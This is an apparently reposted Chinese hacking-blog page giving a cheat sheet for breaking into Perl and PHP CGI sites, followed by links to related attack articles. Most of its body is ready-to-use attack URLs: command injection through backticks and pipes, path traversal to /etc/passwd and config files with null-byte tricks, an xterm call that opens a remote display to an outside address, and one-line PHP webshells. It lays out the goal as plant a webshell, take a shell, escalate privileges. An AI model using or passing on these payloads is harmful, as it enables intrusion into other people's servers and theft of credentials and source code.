CGI Hack整理 【swap】【新鲜热辣12月20日版】

GOOGLE HACKING 系列文章 【FreeXploiT整理收集】 本文涉及作者 swap(慕容小雨),zhaohuan(Xfocus),snipe(4ngel)信息安全的隐患-GoogleHacking原理和防范作者:zhaohuan@phack.org 来源:www.phack.org技术天地:GoogleHacking是利用Google的搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,最近这种以前由黑客手动进行操作的攻击手段可以通过一种新的蠕虫病毒来 阅读详情

作者:swap( 慕容小雨)

总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权
感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们
注“
perl脚本的漏洞大多出在open()、system()或者 ''调用中。前者允许读写和执行,而后两个允许执行。
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET

http://target.com/cgi-bin/home/news/sub.pl?12 随意构造
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号
http://target.com/cgi-bin/home/news/sub.pl?`id`
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`
http://target.com/cgi-bin/home/news/sub.pl?`cat<'/home1/siteadm/cgi-bin/home/news/sub.pl'` 非常好的思路,把代码cat回来显示

http://target.com/test.pl;ls|
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|
http://target.com/test.pl?'id' 类似''内的操作和命令执行自己构造
比如:cat<'/home1/siteadm/cgi-bin/home/news/test.pl'` 把pl代码显示出来。
http://target.com/index.cgi?page=;dir+c:/|&cid=03417 类似asp的Sql injection

http://target.com/test.pl?&........ /../../etc/passwd

http://www.target.org/cgi-bin/club/scripts/userinfo.pl?user=./test 前面加./
http://www.target.org/cgi-bin/club/scripts/userinfo.pl?user=test%00 注意后面的 %00 别弄丢了
http://www.target.org/cgi-bin/club/scripts/userinfo.pl?user=../../../../etc/passwd%00

http://www.target.org/show.php?filename=../../../../../../../home/murong/include/config.php 查看php代码
http://www.target.org/show.php?filename=../../../../../../../home/murong/admin/global.php

emm和ps的一句话"<?copy ($a,$b);unlink($a);?>"
echo "<?php copy(/$_FILES[MyFile][tmp_name],/$_FILES[MyFile][name]);?>" > up.php
<?php eval($_POST[cmd]);?>

http://www.target.org/cgi-bin/club/scripts/change_pw.pl?passwd0=1&passwd1=22&passwd2=22&key=../../../../../../../../bin/ls%20

>bbb%20|

http://www.target.org/cgi-bin/club/scripts/'less showpost.pl/' 并且寻找(用/'//')/'SELECT/' 字符串

http://www.target.org/cgi-bin/club/scripts/..%c0%af../..%c0%af../bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin

相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法
http://target.com/index.html#cmd.exe
http://target.com/index.html?dummyparam=xp_cmdshell
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd


PS:很久前整理asp注射和php注射大全都是私下给好友的,不知道哪个马甲不够意思,就发了出去。现在满bbs和各动画站点都能看到,而且
作者乱七八糟, 幸亏吃亏以后,再整理或者写的其他文章技巧,只给几个特好的朋友。再也不敢乱发了,用pinke话说,"我写/发现个东西我
容易吗,不知道怎么就被人做成动画或者教程,拿来赚钱也罢了,还要留一句话,没什么技术,黑站就这么简单." 鄙视这些人们……有本事你
们自己写个lcx,或者什么shell去?我写不来,但是用朋友的,我也心安理得

Trackback: http://tb.donews.net/TrackBack.aspx?PostId=664403

shell脚本与工业物联网实战 <think>我们根据要求生成摘要,不超过150字。内容是关于一个端口监听掉线自启动脚本的说明。需要简洁概括功能、特性、使用。用户的问题是从该内容中生成摘要。注意要求“根据以下内容,生成≤150字的文章摘要”。所以我们要提取关键信息。 关键点:脚本用于循环检测端口,端口不通时检查容器状态并自动启动;记录志;自动创建志目录;依赖nc工具;通过crontab定时执行。 字数控制在150字以内。摘要应包含功能、主要逻辑、前置条件、定时配置。不要过于细节。 我们写一个约100-150字的摘要。 注意 阅读详情

相关推荐

Coze HTTP请求节点实战:5分钟搞定天气API对接(含动态参数技巧)

本文通过一个天气预报API对接的实战案例,详细讲解了如何在Coze平台使用HTTP请求节点实现外部数据交互。文章重点演示了动态参数传递、JSON响应解析与错误处理等核心技巧,帮助开发者在5分钟内快速构建稳定可靠的智能体外部服务调用能力。

weixin_29233333的博客 653

深入解剖Tomcat

Tomcat安装:Tomcat 是一种有JSP环境的Servlet的容器。Servlet容器是代替用户管理和调用 Servlet的运行时外壳。Servlet容器可以粗略的划分成下面几类:1. 独立的servlet容器独立的servlet容器Web服务器的一部分。当使用一个以Java为基础的Web服务器时就是这种情况, 例如是JavaWebServer的一部分的servlet容器。独立的Servle

SilverLong专栏 2169

详细解读经典跨模态对齐技术Q-Former代码

介绍BLIP2的博客层出不穷,介绍Q-Former的博客也不少,但是详细解读Q-Former代码的博客很少。这篇博客希望以代码为基础,讲明白Q-Former的原理和核心思想,并详细解读一些值得注意的细节。希望读者们能从这一经典技术中朝花夕拾,得到启发。

沉迷单车的追风少年 2389

FreeXploiT 成立三年感言!

 04年成立的,和一个朋友,现在那个朋友不知所踪了(他叫菜菜,很早就玩汇编了)后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧? 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ,当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo

FreeXploiT 8480

万能上传击溃ASP/PHP/JSP脚本系统

 文/图 勇哥儿本文已发表在黑客x档案,转载请注明 自从动网7拉开上传漏洞序幕后,各种系统的上传漏洞接踵而来!它们的漏洞原理基本都差不多,利用方法上有略微的差异,简言之可以归纳为几步:先抓包,然后修改文件类型,再在上传路径后加上空格,用十六进制编辑器把空格改成00,最后用NC提交。当然最好还是找一个具体的UpFile文件来自己分析一下,这样有助于提高对漏洞的理解和记忆!本文没有太高深的技术,只不过

FreeXploiT 8068

fuckipb batShell

这个exploit是在0x557.cn irc room superhei 那里得知的 thx exp的核心是ipb0day.exe 这个fuckipb.bat 只是batShell 运行情况输入网站地址 例如 http://www.ph4nt0m.org/ipbbbs/ 你就输入 www.ph4nt0m.org输入网站地址:bbs.null.com输入论坛目录 例如 http://www.ph4

FreeXploiT 7374

整理的一些有用的ASP注入相关的命令 BY pt007&solaris7

整理的一些有用的ASP注入相关的命令 BY pt007&solaris7    大家好 ,我们是pt007和solaris7,QQ:7491805/564935,欢迎高手前来交流:)。1、    用^转义字符来写ASP(一句话木马)文件的方法:    http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdsh

FreeXploiT 3981

NB联盟 SQL安全设置攻略

NB-裤衩[XX]前SQL INJECTION的攻击测试愈演愈烈,很多大型的网站和论坛都相继被注入。这些网站一般使用的多为SQL SERVER数据库,正因为如此,很多人开始怀疑SQL SERVER的安全性。其实SQL SERVER 2000已经通过了美国政府的C2级安全认证-这是该行业所能拥有的最高认证级别,所以使用SQL SERVER还是相当的安全的。当然和ORCAL、DB2等还是有差距,但是

FreeXploiT 3836

QQ跨站漏洞巧利用一例【强迫别人帮你买QQ秀】【应该以失效】

免责声明本文仅限于讨论网络安全技术,严禁利用本文所提到的漏洞进行非法攻击,利用本文章进行的攻击和造成的损失由攻击者承担全部责任,与作者无关!前言本文原为向《电脑报》的投稿,是两个月之前写的稿子,我很遗憾《电脑报》编辑拖沓的效率,所以只能自行发布这篇稿子了,再次为电脑报编辑对待作者的态度感到遗憾!----------------------------------------------------

FreeXploiT 3301

由Jsp+Mysql注入到root权限的全程展 【好久没有安全类文章了,转一篇看看】

由Jsp+Mysql注入到root权限的全程展作者:pingping信息来源: http://pingping78.blogchina.com/ 最近有点空闲,所以写点垃圾文章来消磨一下时间.文中没有什么技术含量,如果要转载,请注明作者并保持文章的完整.很多人可能都知道asp,php的编程要防止sql注入漏洞,而并不知道jsp编程同样也需要防备sql注入漏洞.其实,一旦jsp代码有注入漏洞,将直接

FreeXploiT 2974

安全漏洞漫谈 【http://luoluo.cnblogs.com/】

每天,当我们打开bugtraq邮件列表,一个个的新漏洞不停的被发掘出来,让我们眼花缭乱:缓冲区溢出,Sql注入,XSS跨站脚本……,于是黑帽子们纷纷就这些公布的细节开始分析漏洞,编写攻击代码并测试之;白帽子们同样也要分析这些漏洞,并写漏洞扫描规则或者防范规则。黑帽子们的攻击代码很快就会在网上流传,脚本小子们也开始忙碌起来,他们不厌其烦的利用这些漏洞取得世界各地的具有漏洞的主机的控制权限,有时候病毒

FreeXploiT 2573

eWebEditor:网站中的隐形炸弹

位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下

FreeXploiT 2142

一种察看asp源代码的思路

方法很简单,我们知道,一般在asp中应用文件时一般采用    两种方式,通过stm文件,是可以直接将asp文件的源代码直接输出到客户浏览器中。    要求:    1、服务器端要有shtml脚本映射    2、可以向服务器写入.stm/.shtm/.shtml后缀文件    3、知道想察看文件的文件名及相对位置    举例:    向服务器目录写入test.

FreeXploiT 2105

不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令

 我的BLOG里有一篇文章介绍了关于SQL注入的基本原理和一些方法。最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句:EXEC master.dbo.xp_cmdshell dir c:/但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库x

FreeXploiT 1786

oracle注射总结

资料:http://www.petefinnigan.com/papers/detect.sql a=a or 1=1 SQL> exec get_cust(x union select username from all_users where x=x); debug:select customer_phone from customers where custome

FreeXploiT 1729

不同数据库中获得表名列表的SQL(继续偷冰血)

这个《不同数据库中获得表名列表的SQL 》转载自高手温少的blog。感谢他的总结:)引用: 记得大学那时刚学SQL Server,还为这个问题困惑过。今天偶然看到一篇网友的文章,涉及到这个问题,就整理出来了。 OracleCode:SELECT TABLE_NAME FROM USER_TABLES ORDER BY TABLE_NAMEMy

FreeXploiT 1697

飞凌嵌入式ElfBoard-Shell常用工具和命令-sleep命令

sleep命令在Linux中用于创建一个虚拟的工作,这个工作可以帮助我们延迟执行。它默认以秒为单位接受时间,但是也可以通过在末尾添加一个小后缀(s, m, h, d)来将其转换为任何其他格式。当用户在 Linux 中发出多个命令序列时,命令会立即一个接一个或同时执行(例如,tee 命令)。但是,有时需要推迟命令的执行并为系统提供足够的时间来产生预期的结果。其中sleep后面的时间可以根据实际情况来改变,1就是间隔1s,改的数字越小,进度条越快,反之越慢。sleep命令主要接受一个参数,即延迟的时间。

2301_76587520的博客 191

飞凌嵌入式ElfBoard-函数

shell中的函数定义比较简单,定义函数名可以没有类型,函数返回值可有可无,如果有返回值,必须返回整数n(0~255)。同时,函数的定义必须放在shell脚本的开头部分,只有函数被shell解释器发现后,才能发调用。function 函数名()

2301_76587520的博客 161

linux提权/shadow可读写提权/passwd可写提权

反弹 Shell(Reverse Shell)是一种反向连接的命令交互通道。常规 Shell 是攻击机主动连接目标服务器(正向 Shell);反弹 Shell 是被攻击的 Linux 服务器主动向外连接攻击机,主动把命令行控制权 “弹” 给攻击者。

2303_82039857的博客 202

履带底盘urdf文件。

履带底盘urdf文件

上一篇: 赤壁之战前夕东吴BBS上的秘密对话 【泄漏版】
下一篇: QQ跨站漏洞巧利用一例【强迫别人帮你买QQ秀】【应该以失效】
freexploit
博客等级 码龄22年 315粉丝 778原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值